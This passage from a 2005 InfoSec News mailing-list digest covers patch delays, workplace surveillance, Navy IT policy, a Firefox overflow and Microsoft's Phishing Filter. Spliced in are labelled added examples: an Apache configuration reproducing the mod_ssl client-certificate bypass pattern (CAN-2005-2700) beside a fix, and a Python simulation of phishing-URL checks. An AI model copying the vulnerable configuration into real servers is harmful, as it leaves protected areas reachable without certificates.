Distributed by: Guardian Digital, Inc.                LinuxSecurity.com

To unsubscribe email vuln-newsletter-request@linuxsecurity.com
with "unsubscribe" in the subject of the message.
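The mod_ssl issue behind the Fedora and Red Hat httpd updates above (CAN-2005-2700), shown as the configuration pattern it affects next to an arrangement that does not depend on the per-location check. This is an added illustration, not text from the newsletter or any vendor advisory; the addresses, hostnames, paths and the assumption that the whole virtual host may demand client certificates are made up for the example.

```apache
# Added example, not from the advisory. Addresses, hostnames and
# certificate paths are constructed for illustration.

# --- Pattern affected in unpatched httpd 2.0.x (the FC3/FC4 httpd above) ---
<VirtualHost 192.0.2.10:443>
    ServerName www.example.test
    SSLEngine on
    SSLCertificateFile    /etc/pki/tls/certs/www.example.test.crt
    SSLCertificateKeyFile /etc/pki/tls/private/www.example.test.key
    SSLCACertificateFile  /etc/pki/tls/certs/client-ca.crt

    # Client certificates are optional for the virtual host as a whole ...
    SSLVerifyClient optional
    SSLVerifyDepth  2

    # ... but meant to be mandatory for one location. In the affected
    # versions this per-location "require" was not honoured when the
    # virtual host said "optional", so a client presenting no certificate
    # could still reach /admin. Updating httpd is the fix the advisories
    # describe; the block below is an arrangement that sidesteps the
    # per-location path entirely.
    <Location /admin>
        SSLVerifyClient require
    </Location>
</VirtualHost>

# --- Arrangement that does not rely on the per-location check ---
# Assumption: everything served by this host may require a client
# certificate, so "require" can live at virtual-host scope, where it is
# enforced during the initial TLS handshake rather than by a later
# per-location renegotiation. The protected content gets its own host.
<VirtualHost 192.0.2.11:443>
    ServerName admin.example.test
    SSLEngine on
    SSLCertificateFile    /etc/pki/tls/certs/admin.example.test.crt
    SSLCertificateKeyFile /etc/pki/tls/private/admin.example.test.key
    SSLCACertificateFile  /etc/pki/tls/certs/client-ca.crt

    SSLVerifyClient require
    SSLVerifyDepth  2
</VirtualHost>
```

After applying the vendor update, re-test the first pattern by connecting to the protected location without a client certificate; the request should be refused at the TLS layer.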
------------------------------------------------------------------------

From isn at c4i.org Sat Sep 10 00:07:43 2005
From: isn at c4i.org (InfoSec News)
Date: Sat Sep 10 00:39:43 2005
Subject: [ISN] MS Patch Day: Can 1 Bulletin Hit the Spot?
Message-ID:

http://www.eweek.com/article2/0,1895,1856973,00.asp

By Ryan Naraine
September 8, 2005

Microsoft on Thursday announced plans to ship one security bulletin on Tuesday, Sept. 13, to provide patches for a "critical" flaw in its Windows operating system.

As part of its advance notice mechanism, the Redmond, Wash.-based software giant said the security update will require a restart and can be detected with the MBSA (Microsoft Baseline Security Analyzer) tool.

The solitary bulletin will give IT administrators a temporary respite from patching - especially after the clean-up from the recent Zotob worm attacks - but to many in the security research community, it underscores Microsoft Corp.'s sluggish approach to addressing known security vulnerabilities.

eEye Digital Security, a private research firm with headquarters in Aliso Viejo, Calif., maintains a Web page of Upcoming Advisories that have been validated by software vendors. Next Tuesday, when Microsoft ships the Windows update, one of the eEye-discovered flaws will be 108 days overdue.

eEye starts counting overdue days a full 60 days after a vulnerability has been "validated" by a software vendor, which means that Microsoft has been aware of the security hole for more than five and a half months.

In all, eEye has reported nine vulnerabilities that have been validated by officials at the MSRC (Microsoft Security Response Center). Three of the nine flaws are more than two months overdue and all carry a "high severity" risk rating. Customers at risk include users of the widely deployed Internet Explorer browser, the Microsoft Outlook and Outlook Express mail clients, and various versions of Windows.

"It's safe to assume that once we find a flaw, someone else will probably find it. The problem here is that someone malicious might find it and exploit it before Microsoft can provide full protection," said Steve Manzuik, product manager in eEye's research group.

"There are some extremely smart hackers out there using and sharing the tools that find these vulnerabilities. When Microsoft takes a long time to issue fixes, it sets up a dangerous situation," Manzuik said in an interview with Ziff Davis Internet News.

"This month, Microsoft is only issuing one patch and we already know it's not one of ours. That means that our overdue list will keep getting longer and longer," Manzuik added.

eEye is not the only private research outfit finding and reporting vulnerabilities to Microsoft. Most companies do not keep a running tally of the flaws they report, and some keep the information under wraps until Microsoft ships the required update.

"This all goes back to the responsible disclosure debate," said Thor Larholm, senior security researcher at PivX Solutions Inc., a Newport Beach, Calif.-based security consulting firm.

"The longer it takes Microsoft to address a known vulnerability, the higher the probability that one of the 'bad guys' will find it and release the details to the public. Microsoft has a responsibility to get these fixes out quickly," Larholm said.

Both Manzuik and Larholm acknowledged that Microsoft has improved significantly in its response to software security, but they argue that the company must find a way to avoid lengthy delays.

"Microsoft is no longer the worst offender when it comes to sitting on patches. Oracle has taken that crown," Larholm said. "But I think there's still a culture at Microsoft that security is a PR issue that must be handled delicately. And that's a dangerous culture."

"Overall, they have improved, there's no doubt about that. But unless they move faster on some of these high-impact vulnerabilities, we'll always deal with rogue researchers finding the same things," Manzuik said.

Inevitably, zero-day exploits along with full details of the unpatched flaw are released on underground sites, putting millions of Microsoft customers at risk.

"It would be really nice to see Microsoft turn around a patch in between 60 and 90 days. Considering the size of the company and the way some of these Internet-facing software [apps] are complicated, the 90-day window isn't that bad. But when it creeps up to three and four months, it becomes unacceptable," eEye's Manzuik said.

A spokesperson for the MSRC said Microsoft is still testing the reported vulnerabilities, and that patch quality will take precedence over time.

"Security response is a delicate balance of time and testing, and Microsoft will only issue an update when it has been fully tested and deemed a complete fix for the issue," the spokesperson said in an interview.

"Microsoft has the ability to test on all platforms with a number of different tools and with the developers of each product. Microsoft is able to test more thoroughly than an independent researcher, and has a responsibility to get the update right. They will not compromise the accountability to customers," she added.

From isn at c4i.org Mon Sep 12 02:21:39 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 12 02:28:06 2005
Subject: [ISN] Video Surveillance - The Hidden Camera
Message-ID:

Forwarded from: Mark Bernard

Dear Associates,

Employees do have a right to privacy and organizational policies cannot overly favour the company without providing a balance for employees.

For example, while working with an international organization conducting policy compliance and penetration testing I measured compliance with a policy that granted employees the right to privacy.
This policy stated that the top desk drawer of the employee's cubicle/office was designated as private and would never be searched (without a warrant). Additional assurances were given, including that monitoring would not be conducted in sensitive areas such as washrooms and changing rooms.

Based on my extensive research of our Canadian Federal Privacy Commissioner's investigation archives, many businesses have been brought into focus for the overuse and misuse of digital surveillance equipment. For instance, in most cases involving the transportation industry investigations have resulted in the removal of surveillance camera(s). Most employee cases were based on the fact that the business was monitoring employee productivity and that the surveillance camera had not helped to prevent theft, as the business had alluded to.

All the best,
Mark.

======= beginning of excerpt =========

http://www.csoonline.com/read/090105/hiddencamera_3824.html

The Hidden Camera

...and other surveillance missteps can sour employees, threaten your success or get you sued. These six dos and don'ts will keep you in focus.

By Todd Datz

Drip. Drip. Drip. That's what caught the new employee's attention - water dripping from the ceiling of her office. Why was water leaking from the ceiling, she wondered? Taking a closer look, she didn't find the source of the leak. Much to her surprise, what she did find was a hidden camera. The company shouldn't have been too surprised when she filed a complaint.

That juicy (in a Court TV kind of way) incident took place a couple of years ago, recounts an attorney whose firm defended the company after the woman filed a wrongful termination lawsuit (the complaint was raised as part of the suit; the attorney asked to remain anonymous). Why was a camera secreted in the ceiling? Turns out that the company, with the blessing of the HR director, had installed a camera in that particular office to deter a worker suspected of stealing.
It was a nonworking (fake) camera and, originally, plainly visible. After that employee resigned, the company remodeled the office, covering (but not removing) the camera. Ultimately, the company argued that it was a nonworking camera; the suit was dismissed on other grounds. "If the camera had been working, it might have been a different outcome," says the attorney.

CSOs have a lot of leeway when it comes to monitoring employees. After all, companies own the computers, telephones and electronic equipment their workers use, and have the well-established right to monitor their usage. The same is true for video surveillance - the legal system gives organizations the right to place cameras in every nook and cranny of their workplaces, with the exception of areas where employees have a reasonable expectation of privacy (bathrooms and locker rooms, for example).

But many companies don't actually have a written policy in the employee handbook stating that the company has the right to freely monitor the workplace. In research conducted for this special report, 44 percent of respondents copped to having no official video surveillance policy (see additional results from the "CSO Surveillance and Monitoring Survey" on Page 28).

And if companies aren't spelling out their surveillance posture now, then the picture promises more static than clarity in the near future. Digital, IP-based video systems are beginning to make a dent in the old-line hegemony of CCTV systems, and cameras are getting ever smaller, cheaper and more powerful. Inattentive CSOs are sitting on ever more threatening legal landmines.

On the bright side, a little forethought can largely defuse those dangers. "It's not rocket science," says Miles Bielec, director of security operations at software giant SAS. "Security, in my view, is rooted solely in common sense."

Below are six tips - some dos and don'ts that are indeed mostly common sense - that can help you navigate the current world of video surveillance and prepare for its rapid evolution, while avoiding any of the boneheaded moves that can undo in a heartbeat all the goodwill you've spent years building up.

DO create a corporate surveillance policy.

This is the numero uno, smartest step toward intelligent workplace surveillance, so it's a little surprising that so many organizations fail to do it. A video surveillance policy might state where cameras can be placed, as well as the fact that employees have no right to privacy in the general working areas of a facility. It should also make clear the disciplinary consequences that can result from unprofessional employee actions caught on video.

"It should be short and sweet," says Jennifer Shaw, an employment lawyer and partner at Jackson Lewis in Sacramento, Calif. "A lot of employers go crazy being super-detailed when they don't need to be." Shaw advises her clients to write the policy into the employee handbook and to make sure employees have signed off on the handbook, acknowledging that they have read and understood it.

One of the nice things a policy brings to the table is it shows that a company has a regular, standard practice around surveillance. That's something Connie Sadler, director of IT security at Brown University, thinks may be lacking at universities. She's heard of cases where supervisors have independently installed video cameras in buildings in response to thefts, some in not so obvious places. Installing cameras "willy-nilly," as she puts it, makes her uneasy. "The thing that concerns me is not really even whether they're used or how, but more what's our obligation to the community and employees in terms of what we tell them," she says. For example, should those supervisors have to ask permission to put up cameras?

She also points out other gray areas: What if a student steals a laptop in a workspace such as one of the school libraries, and is caught on tape? "The student could say, 'I wasn't notified, there wasn't a policy,'" conjectures Sadler.

Sadler would love to see consistent policies at universities. "I think people are looking for guidance. For so many things that are regulated, we look to industry standards, reasonable application. For video surveillance, I really don't see any reasonable standard."

But the lack of consistent policies is not confined to the halls of academia. When asked to take a crack at estimating what percentage of companies have policies, Shaw figures only half - an estimate that roughly matches CSO's research. "More people are calling me wanting information about it. Some of the calls have been from employers who've been burned because they didn't have a policy in place," Shaw says.

DON'T take a once-and-done approach to communication.

When you've written a policy, don't be shy. Go ahead and shout it from the rooftops. Putting the policy in the handbook is a start, but only a start. (Here's an unshocking revelation: Not all employees read their handbooks.) Sure, you can take heart from the fact that the company is protected if an employee decides to sue for invasion of privacy, assuming that the cameras weren't filming anything off-limits. But why not remind employees of the policy periodically, so you can avoid any misunderstandings or ill will if employees for one reason or another feel like they're being watched inappropriately? Why wait for a potentially embarrassing and expensive lawsuit?

Shaw believes that just communicating the fact that a company has a policy can act as a deterrent to potential wrongdoers. She cites three to four major retail clients with large distribution centers: "Once they announced their policies, theft went down because people knew [their companies] were watching."
DO take the time to tell employees why you use cameras.

This point goes beyond reminding workers that you have a policy, because a little bit of sensitivity can go a long way toward preventing employee resentment. Explaining the reason for the cameras has proven to be a critical step for Bielec at SAS.

In 1993, the company built what's known as Building R on its Cary, N.C., campus. A security control center was located in the subbasement to monitor the new CCTV cameras that were being installed around the campus in lobbies, building entry points and the campus day care. (Before 1993, Bielec says, SAS's use of CCTV was minor.)

Bielec was pleased. But he failed to anticipate the displeasure that spread its way through the employee ranks. Soon rumors started floating around that there were covert cameras. Questions arose: Why are they putting in cameras? What are they watching? Why do we need so much surveillance?

When word started getting back to Bielec, "terror ran up and down my spine," he recalls. "I had done my best to develop a relationship with the employees," he says, but now he worried that he was about to take a giant step backwards.

Bielec had an inspiration. Because two sides of the control center were glass, he decided to turn the monitor banks around, so that the monitor screens faced outward. With this change, any SAS employee walking by the control center can see exactly what the cameras are being used to observe. "I told employees, come on down, you can see what we're looking at. We can show you how [the system] works; we'll let you play with the joysticks," he says. "That alone allayed the monitoring fears."

What Bielec came up against was a very open, creative corporate environment, not unlike that found on a college campus. To many employees, the installation of cameras screamed of Big Brother syndrome. Bielec assured employees that the system was more about customer service (such as letting employees back in the building if they accidentally got locked out during a smoking break), to give employees peace of mind and to keep an eye on more places than was otherwise humanly possible (data centers, for example).

It was a good lesson for Bielec, one he fell back on recently. After a fire in the area of the loading dock outside SAS's production studio (a container of linseed-soaked rags ignited in the bed of a pickup truck), Bielec had installed a camera to monitor the racks where solvents are stored, intending to get a better chance of catching any accidental combustion early. The camera actually panned a little bit into the shop area, where workers built set pieces. The workers expressed some concern - they understood the need for the camera, but didn't want theirs to be the only work area under surveillance. So Bielec solved the problem by moving the camera 20 feet away, so that it looked only at the area where the flammable materials were stored.

DON'T use dummy cameras without considering the risks.

If cameras deter theft by their mere presence, CSOs may be tempted to nail up a few cameras that aren't activated. In CSO's survey, 23 percent of respondents said they include some fake or deactivated cameras as part of their surveillance practice. But are fake cameras worth the potential downsides?

Douglas Durden, manager of safety, security and asset retention at Mallory Alexander International Logistics, thinks that often they are not. He believes fake cameras can impart a false sense of security. "Let's say someone is standing in front of what appears to be a camera. If a guy pulls a gun and takes a person's wallet, you should be able to pull it up on tape [but you can't]. Then you have to tell the person it was a fake camera," he says. Lawsuit, anyone?

Walter Palmer, founder and principal of PCGsolutions, a retail loss-prevention consultancy, also advises caution. "One of the things you have to be careful of is, do you have an obligation to provide certain levels of security? If you don't have cameras and something occurs or you have dummy cameras, could you be liable for negligent security?" he asks. It depends on the circumstances, of course, but the short answer is yes.

All things considered, Jackson Lewis's Shaw thinks, there are limited circumstances in which fake cameras are appropriate, but generally they do more harm than good. "They're a bad idea all around, in my opinion," she says.

DO think long and hard before deploying hidden cameras.

The rapid evolution of camera technology - smaller cameras, better resolution, cheaper prices - has made it easier for companies to gobble up more and more of them. But it also opens the door for more misuse of covert surveillance.

Last November, nurses at Good Samaritan Hospital in Los Angeles were in a break room when, according to accounts, they spied a thin beam of light coming from a clock. They were shocked to discover a hidden camera with a tiny lens behind the number nine. The nurses immediately spread the word to their colleagues; eventually they discovered a total of 16 hidden cameras in the clocks of break rooms, a pharmacy and a fitness center, among other locations.

In addition to the fact that the nurses hadn't been informed about the cameras, they were also upset because some of them changed their clothes in the break rooms. They felt that their right to privacy had been violated. In a press release, a California Nurses Association spokesperson said, "This is a pervasive problem throughout the hospital that is a disgraceful violation of the legal privacy rights of the RNs and reflects a deplorable attitude of the hospital administration towards its caregivers."
Hospital officials defended their actions - they claimed the cameras were installed for security reasons, that it was standard practice in hospitals, that they had planned on informing the nurses and that the cameras hadn't been turned on. They also noted (see the first tip) that the nurses' employee handbook, which all must sign, states that surveillance might be used.

Ultimately, the messy situation might have been avoided if hospital execs had informed the nurses of their plans beforehand, explained that the cameras were for their safety and made them overt instead of covert. By neglecting to inform the nurses until the cameras had been discovered, the hospital engendered suspicion and ill will among a core group of employees. There may still be a place for hidden cameras in a CSO's arsenal, of course. It just makes sense to deploy them wisely.

DON'T overlook the special complications of a union workforce.

Union employees have certain contractual rights that nonunion employees may lack. CSOs with unions in the workplace will need to review National Labor Relations Board (NLRB) rulings specifically concerning video surveillance.

For example, the NLRB decided in the 1997 case Colgate-Palmolive Co. that the installation of hidden cameras is a mandatory subject of bargaining. (An employee had found a camera hidden in an air vent in a men's restroom.) That decision was reinforced in 2003 by a federal appeals court in National Steel Corp. v. NLRB. (The company had placed a hidden camera in a manager's office to catch the person who was making long-distance phone calls at night.)

More recently, in July the U.S. Court of Appeals for the District of Columbia Circuit upheld a 2004 NLRB decision in a case involving Anheuser-Busch. In 1998, the king of beers had installed hidden cameras in work and break areas in one of its St. Louis facilities. Sixteen employees were later disciplined (five were fired) after being caught on tape taking lengthy breaks, sleeping, smoking pot and urinating on a rooftop. The court supported the NLRB, which had previously ruled that Anheuser-Busch was at fault for not giving notice to the union before installing the cameras (although the NLRB had also ruled that the workers were not entitled to back pay or reinstatement). The court sent the case back to the NLRB to determine whether the workers were entitled to any remedies.

CSOs should also be mindful that any introduction of surveillance into the workplace could be cause for a union grievance, according to the Labor Research Association. A report titled "Employer Snooping: What Rights Do Workers Really Have?" says "When a company seeks to introduce video surveillance, monitor e-mail, conduct random searches or other workplace surveillance policies, it is attempting to change working conditions, according to the NLRB. As a result, the terms of these policies are considered a 'mandatory subject' of collective bargaining and must be negotiated with the workers' union." It goes on to cite some examples of what an employer and union might negotiate, including allowing workers to defend themselves against accusations and agreeing that nonwork areas remain camera-free.

As technology progresses, bringing with it the ability to monitor the workplace more cheaply and easily than ever before, there's a concomitant increase in the chance that things can get messy. Taking the time to understand all the issues - to manage your surveillance risks - will ensure that your surveillance posture is no slouch.

======= end of excerpt =============

Best regards,
Mark.

Mark E. S. Bernard, CISM, CISSP, PM,
Principal, Risk Management Services,
e-mail: Mark.Bernard@TechSecure.ca
Web: http://www.TechSecure.ca
Phone: (506) 325-0444

Leadership Quotes by Warren Bennis:
"The manager asks how and when; the leader asks what and why?"
From isn at c4i.org Mon Sep 12 02:23:12 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 12 02:29:23 2005
Subject: [ISN] Navy: Don't access personal e-mail at work
Message-ID:

http://www.fcw.com/article90710-09-09-05-Web

By Frank Tiboni
Sept. 9, 2005

Navy employees can no longer access personal e-mail accounts, including Yahoo Mail and Microsoft Hotmail, from the service's networks without approval. That is one of six rules in the Navy's new acceptable use of information technology policy issued in July.

The "Effective Use of Department of Navy IT Resources," states that the service's military, civilian and contractor users cannot:

* Automatically forward official Navy e-mail to a commercial account or use a commercial account for official government business without approval.

* Install or modify computer hardware or software without approval.

* Circumvent or disable security measures, countermeasures or safeguards, such as firewalls, content filters and antivirus programs.

* Participate in or contribute to activity that causes a disruption or denial of service.

* Write, code, compile, store, transmit, transfer or introduce malicious software, programs or code.

* Use peer-to-peer (P2P) file sharing applications, such as Kazaa, Shareaza and OpenP2P without approval and only in support of Navy missions.

"This policy is intended to promote effective and secure use of IT resources within the Department of the Navy and is an integral part of the department's information assurance efforts," according to the policy released by the Navy Department's Chief Information Officer's Office.

The policy especially called attention to the dangers of P2P applications, software that permits users to share files including music and pictures with other users without centralized security controls or oversight.
"Unauthorized use of P2P file-sharing can result in significant vulnerabilities to Department of the Navy information systems including unauthorized access to information, compromise of network configurations and denial-of-service," according to the policy.

Some Navy employees do not know they should no longer access personal e-mail at work. However, The Periscope, a publication of the Navy's submarine base at Kings Bay, Ga., published a story Sept. 8 about the service's new IT policy.

From isn at c4i.org Mon Sep 12 02:22:57 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 12 02:30:28 2005
Subject: [ISN] Bruce Schneier: Toward a truly safer nation
Message-ID:

http://www.startribune.com/stories/562/5606306.html

Bruce Schneier
September 11, 2005

Leaving aside the political posturing and the finger-pointing, how did our nation mishandle Katrina so badly? After spending tens of billions of dollars on homeland security (hundreds of billions, if you include the war in Iraq) in the four years after 9/11, what did we do wrong? Why were there so many failures at the local, state and federal levels?

These are reasonable questions. Katrina was a natural disaster and not a terrorist attack, but that only matters before the event. Large-scale terrorist attacks and natural disasters differ in cause, but they're very similar in aftermath. And one can easily imagine a Katrina-like aftermath to a terrorist attack, especially one involving nuclear, biological or chemical weapons.

Improving our disaster response was discussed in the months after 9/11. We were going to give money to local governments to fund first responders. We established the Department of Homeland Security to streamline the chains of command and facilitate efficient and effective response.

The problem is that we all got caught up in "movie-plot threats," specific attack scenarios that capture the imagination and then the dollars. Whether it's terrorists with box cutters or bombs in their shoes, we fear what we can imagine. We're searching backpacks in the subways of New York, because this year's movie plot is based on a terrorist bombing in the London subways.

Funding security based on movie plots looks good on television, and gets people reelected. But there are millions of possible scenarios, and we're going to guess wrong. The billions spent defending airlines are wasted if the terrorists bomb crowded shopping malls instead.

Our nation needs to spend its homeland security dollars on two things: intelligence-gathering and emergency response. These two things will help us regardless of what the terrorists are plotting, and the second helps both against terrorist attacks and national disasters.

Katrina demonstrated that we haven't invested enough in emergency response. New Orleans police officers couldn't talk with each other after power outages shut down their primary communications system -- and there was no backup. The Department of Homeland Security, which was established in order to centralize federal response in a situation like this, couldn't figure out who was in charge or what to do, and actively obstructed aid by others. FEMA did no better, and thousands died while turf battles were being fought.

Our government's ineptitude in the aftermath of Katrina demonstrates how little we're getting for all our security spending. It's unconscionable that we're wasting our money fingerprinting foreigners, profiling airline passengers, and invading foreign countries while emergency response at home goes underfunded.

Money spent on emergency response makes us safer, regardless of what the next disaster is, whether terrorist-made or natural. This includes good communications on the ground, good coordination up the command chain, and resources -- people and supplies -- that can be quickly deployed wherever they're needed.

Similarly, money spent on intelligence-gathering makes us safer, regardless of what the next disaster is. Against terrorism, that includes the NSA and the CIA. Against natural disasters, that includes the National Weather Service and the National Earthquake Information Center.

Katrina deftly illustrated homeland security's biggest challenge: guessing correctly. The solution is to fund security that doesn't rely on guessing. Defending against movie plots doesn't make us appreciably safer. Emergency response does. It lessens the damage and suffering caused by disasters, whether man-made, like 9/11, or nature-made, like Katrina.

-=-

Bruce Schneier is the author of "Beyond Fear: Thinking Sensibly About Security in an Uncertain World." He can be reached at www.schneier.com

From isn at c4i.org Mon Sep 12 02:23:23 2005
From: isn at c4i.org (InfoSec News)
Date: Mon Sep 12 02:31:08 2005
Subject: [ISN] Firefox flaw found: Remote exploit possible
Message-ID:

http://www.computerworld.com/securitytopics/security/story/0,10801,104504,00.html

By Peter Sayer
SEPTEMBER 09, 2005
IDG NEWS SERVICE

Computers running the Firefox browser could be open to remote attack as a result of a buffer overflow vulnerability reported today by security researcher Tom Ferris.

Vulnerable versions of Firefox include all those up to 1.06, and even the just-released Version 1.5 Beta 1 (Deer Park Alpha 2), Ferris wrote in a posting to his Web site, Security Protocols, and to the Full Disclosure security mailing list just after 1 a.m. EDT today.

Ferris said he reported the bug to staff at the Mozilla Foundation, the organization behind the Firefox browsers, on Sept. 4, but had no idea whether the foundation is working on a fix for the problem.

The problem is caused by a bug in the code Firefox uses to process HTML links in Web pages, Ferris said. Links pointing to a host with a long name composed entirely of dashes can be crafted so that Firefox will execute arbitrary code of an attacker's choosing.
Mozilla officials said today that they learned of the issue on Tuesday and are already working on a patch. "We have a preliminary patch for part of the problem, and are in the process of developing a comprehensive solution that will appear in an upcoming release," said Michael Schroepfer, Mozilla's head of engineering. He was not sure when the patch would be released. Last month, Ferris reported a critical flaw in fully patched versions of Microsoft Corp.'s Internet Explorer 6 running on Windows XP Service Pack 2. The flaw was acknowledged by Microsoft, but in that instance, Ferris did not reveal any details of the flaw or how it could be exploited. -=- Computerworld's Sharon Machlis and Todd Weiss contributed to this report. From isn at c4i.org Mon Sep 12 02:22:24 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 12 02:31:38 2005 Subject: [ISN] Security consortium offers C&A credential Message-ID: Forwarded from: matthew patton > Consortium officials said that W. Hord Tipton, chief information > officer at the Interior Department, and Jane Scott Norris, chief > information security officer at the State Department, were in the > first group who passed the CAP exam. Anybody find the mention of the 2 guys here something bordering on "damning by faint praise"? Wasn't it the Dept of Interior who has had certain parts of its networks forcibly cut off by court order several times now for rampant security failure? The State Department isn't exactly known for their track record in this space either. From isn at c4i.org Mon Sep 12 02:22:42 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 12 02:33:00 2005 Subject: [ISN] Microsoft to track internet use Message-ID: http://www.theage.com.au/news/technology/microsoft-to-track-internet-use/2005/09/08/1125772633503.html Washington September 9, 2005 Microsoft Corp will soon release a security tool for its internet browser that privacy advocates say could allow the company to track the surfing habits of computer users. 
Microsoft officials say the company has no intention of doing so. The new feature, which Microsoft will make available as a free download within the next few weeks, is prompting some controversy, as it will inform the company of websites that users are visiting. The browser tool is being called a Phishing Filter. It is designed to warn computer users about "phishing," an online identity theft scam. The Federal Trade Commission estimates that about 10 million Americans were victims of identity theft in 2005, costing the economy $US52.6 billion ($A69.11 billion). But privacy groups are already raising questions about how this feature will work, and some computer security experts are questioning whether it will be effective. Phishing fraud normally begins when computer users receive emails appearing to be from banks, eBay or credit card companies requesting account updates. Links are provided to websites that seem legitimate. Unwary users are then duped into giving up their Social Security, credit card and banking account information. In an effort to protect internet users, Microsoft's anti-phishing tool is designed to verify the safety of every website, and to issue warnings if users encounter a suspected or known phishing site. It will use a three-step process. First, the browser will automatically compare the address of every website a user visits to a list of sites Microsoft has verified to be legitimate. This list will be kept on users' computers. If no match is found, the Phishing Filter will send the address to Microsoft where it will be compared to a list of known phishing sites that the company intends to update every 20 minutes. A match will trigger a warning that will pop up within the browser. Finally, if no match is found at Microsoft, a sophisticated filter built into the browser will compare characteristics of the suspect website to characteristics common to phishing sites. Under some circumstances, this too could trigger an alert to appear. 
Privacy advocates were surprised to learn that Microsoft would be using this method in an effort to protect its customers. Kevin Bankston, a lawyer and internet privacy expert with the San Francisco-based Electronic Frontier Foundation, worries that this is potentially "a wholesale handing over of one's privacy to Microsoft. I would say, right now, definitely don't use this. If you're careful, you don't need this." The filter is designed as an opt-in feature. The first time computer users attempt to visit a website that is not included on the list of "legitimate" websites, they will be asked whether they wish to enable the Phishing Filter. Users will also be presented with the following on-screen notice, "website addresses will be sent to Microsoft to be checked against a list of reported phishing web sites. Information received will not be used to personally identify you." Users also have the option of turning the filter off. What happens to data? Microsoft officials say the company has no plans to retain information contained in those queries, which company officials say will be encrypted and limited to the domain and path of the website being called. "We don't store that information," said Greg Sullivan, Microsoft Windows group product manager. "There is no server event log, no data base, no hosted event file." But Bankston said the information may be too valuable for the company to ignore in the long run. "There are clear financial imperatives for them to choose to make use of this information in the future and start logging it," he said. "It is not hard to imagine the gold that could be mined out of that information." What is unclear is just how frequently website addresses will be sent to Microsoft. The answer appears to depend, in part, upon how often consumers surf to sites contained in the list of legitimate websites as opposed to sites not on that list. 
Microsoft officials say the list of approved sites, which they are referring to as "the list of highly trafficked legitimate websites," will number in the "tens of thousands." Company officials declined to provide an exact number. Michael Aldridge, a product planner with Microsoft's technology care and safety group, said the company would not be vetting which websites are contained on the list. "It is based ... purely on traffic. We make no judgments on content." That list is being provided by Nielsen NetRatings, which measures internet traffic. Tracy Yen, a company official, also declined to provide the number of names on the list. ICANN, the internet Corporation for Assigned Names And Numbers, reported in August that there are 43 million active registered domain names worldwide. Todd Bransford, vice-president of marketing with internet security firm Cyveillance, referred to the Nielsen list to be used by Microsoft as a "complete drop in the bucket." Bransford said he believes that most internet surfing will ultimately prove to be to sites not on the Microsoft list. That would mean those users who opt in will be sending a majority of their surfing locations to Microsoft. He said the Microsoft Phishing Filter may prove ineffective and could provide a false sense of security for many users. "Phishers are evolving very quickly," he said, "and making sites look different. So with this approach you have a problem where the technology may not know what a phishing site looks like. It may miss a lot of stuff." A further concern is that since the list of legitimate websites is limited, the Phishing Filter may mistakenly identify numerous safe sites as phishing sites. "That's definitely a worry," according to Bankston. Microsoft officials say the Phishing Filter will contain an error reporting link, allowing business and users to quickly inform the company of any errors. 
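The three-step flow the article describes (local allow-list, then a remote lookup of domain and path, then a local heuristic) can be simulated to see exactly which visits leave the machine, which is the core of Bransford's "drop in the bucket" concern. This is an added illustration, not Microsoft's code: the allow-list, the block-list, the heuristic rules and the browsing history are all constructed for the example.

```python
"""Simulation of the Phishing Filter flow described in the article.

Added example; not Microsoft's implementation. List contents, heuristic
rules and the sample browsing history below are constructed.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed stand-in for the "highly trafficked legitimate websites" list
# that the article says is kept on the user's computer.
LOCAL_ALLOW_LIST = {"www.example-bank.com", "www.example-shop.com", "news.example.org"}

# Constructed stand-in for the server-side list of reported phishing sites
# (compared against domain + path, which is what the article says is sent).
REMOTE_BLOCK_LIST = {"example-bank-verify.example.net/login"}

# Brands the constructed heuristic watches for in look-alike hostnames.
WATCHED_BRANDS = ("example-bank", "example-shop")


@dataclass
class FilterOutcome:
    verdict: str                      # allow, warn-known, warn-heuristic, no-match
    sent_to_vendor: Optional[str]     # what (if anything) left the machine


@dataclass
class QueryLog:
    sent: List[str] = field(default_factory=list)


def minimise(url: str) -> str:
    """Reduce a URL to domain + path; query string and fragment are dropped,
    matching the article's description of what the filter transmits."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    return f"{host}{parts.path or '/'}"


def heuristic_suspicious(url: str) -> bool:
    """Constructed stand-in for the built-in step-3 heuristic: flags embedded
    credentials, raw IP hosts, and a watched brand name inside a hostname
    whose registrable domain does not belong to that brand."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.username is not None:
        return True
    if host.replace(".", "").isdigit():
        return True
    registrable = ".".join(host.split(".")[-2:])
    for brand in WATCHED_BRANDS:
        if brand in host and not registrable.startswith(brand + "."):
            return True
    return False


def check_url(url: str, log: QueryLog) -> FilterOutcome:
    """Run one visited URL through the three steps, recording what is sent."""
    host = (urlsplit(url).hostname or "").lower()
    # Step 1: local allow-list. Nothing leaves the machine on a match.
    if host in LOCAL_ALLOW_LIST:
        return FilterOutcome("allow", None)
    # Step 2: no local match, so domain + path goes to the vendor's list.
    query = minimise(url)
    log.sent.append(query)
    if query in REMOTE_BLOCK_LIST:
        return FilterOutcome("warn-known", query)
    # Step 3: no remote match either; fall back to the local heuristic.
    if heuristic_suspicious(url):
        return FilterOutcome("warn-heuristic", query)
    return FilterOutcome("no-match", query)


def simulate(history: List[str]) -> Tuple[List[FilterOutcome], List[str], float]:
    """Return per-URL outcomes, the transmitted queries, and the fraction of
    visits that were reported to the vendor."""
    log = QueryLog()
    outcomes = [check_url(u, log) for u in history]
    return outcomes, log.sent, len(log.sent) / len(history)


# Constructed browsing history; 192.0.2.10 is a documentation-only address.
SAMPLE_HISTORY = [
    "https://www.example-bank.com/accounts?session=abc123",    # allow-listed
    "http://example-bank-verify.example.net/login?user=alice",  # on block-list
    "http://192.0.2.10/example-bank/update.php",                # raw IP host
    "https://blog.example-hobby.net/posts/2005/09",             # small legit site
    "https://news.example.org/article?id=42",                   # allow-listed
]

if __name__ == "__main__":
    results, sent, fraction = simulate(SAMPLE_HISTORY)
    for url, outcome in zip(SAMPLE_HISTORY, results):
        print(f"{outcome.verdict:15} sent={outcome.sent_to_vendor!r}  {url}")
    print(f"{fraction:.0%} of visits reported to the vendor")
```

Note that the small legitimate site is transmitted even though it triggers no warning; only a match on the local list keeps a visit private.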
